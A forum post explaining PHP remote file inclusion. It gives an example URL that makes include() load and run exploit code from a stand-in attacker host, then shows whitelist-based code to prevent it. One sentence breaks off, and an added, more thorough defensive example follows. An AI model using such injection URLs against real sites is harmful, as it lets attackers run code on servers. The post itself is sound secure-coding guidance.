modern-web-design-and-development

(Brent) #1

If your server allows for remote files with include(), you could also inject a file from another server, like http://example.com/template.php?page=http://evilsite.net/exploitcode/2.txt?. Remember, these text files will be executed as PHP inside your other PHP file and thus have access to everything. A lot of them contain mass-mailers or check your system for free space and upload options to store data.

In short: never, ever allow an unfiltered URI parameter to become part of a URI that you load in PHP or print out as an href or src in the HTML. Instead, use pointers:


```php
<?php
// Whitelist: the only values ?page= may take, mapped to the files they load.
$sites = array(
    'about'     => 'about-us.php',
    'contact'   => 'contact.php',
    'clients'   => 'clients.php',
    'portfolio' => 'portfolio.php',
    'home'      => 'index.php',
    'partners'  => 'partners.php'
);

// The request value is used only as an array key, never as a path,
// so a URL or "../" sequence can never reach include().
if( isset($_GET['page']) &&
    isset($sites[$_GET['page']]) &&
    file_exists($sites[$_GET['page']]) ){
    include($sites[$_GET['page']]);
} else {
    echo 'This page does not exist on this system.';
}
?>
```
This way, the parameter is not a file name but a word. So, http://example.com/template.php?page=about would include about-us.php, http://example.com/template.php?page=home would
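The same whitelist idea as a reusable function, with two extra checks a practitioner would want: the script refuses to run at all if PHP is configured to let include() fetch remote URLs, and the resolved file must still sit inside the templates directory. This is an added example, not code from the original post; the `pages/` directory, the `resolvePage()` name and the file names are assumptions.

```php
<?php
// Fail closed if remote includes are enabled in php.ini: the whitelist
// protects against bad keys, this check removes remote file inclusion outright.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is on; set allow_url_include=0 in php.ini');
    http_response_code(500);
    exit;
}

// Public keywords mapped to the files that implement them (assumed names).
const PAGES = [
    'about'     => 'about-us.php',
    'contact'   => 'contact.php',
    'home'      => 'index.php',
];

/**
 * Resolve a ?page= keyword to an absolute include path, or null if it is
 * not allowed. The request value is only ever used as an array key.
 */
function resolvePage(array $pages, ?string $key, string $baseDir): ?string
{
    if ($key === null || !isset($pages[$key])) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $pages[$key]);
    // realpath() is false when the file is missing; also confirm the
    // resolved file has not escaped the templates directory via a symlink.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$requested = $_GET['page'] ?? null;
$page = resolvePage(PAGES, $requested, __DIR__ . '/pages');
if ($page === null) {
    // Log rejected keys (truncated and stripped of control characters) so
    // probing for include() bugs shows up in log review.
    $safe = preg_replace('/[^\x20-\x7e]/', '?', substr((string) $requested, 0, 80));
    error_log('rejected page parameter: ' . $safe);
    http_response_code(404);
    echo 'This page does not exist on this system.';
} else {
    include $page;
}
```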
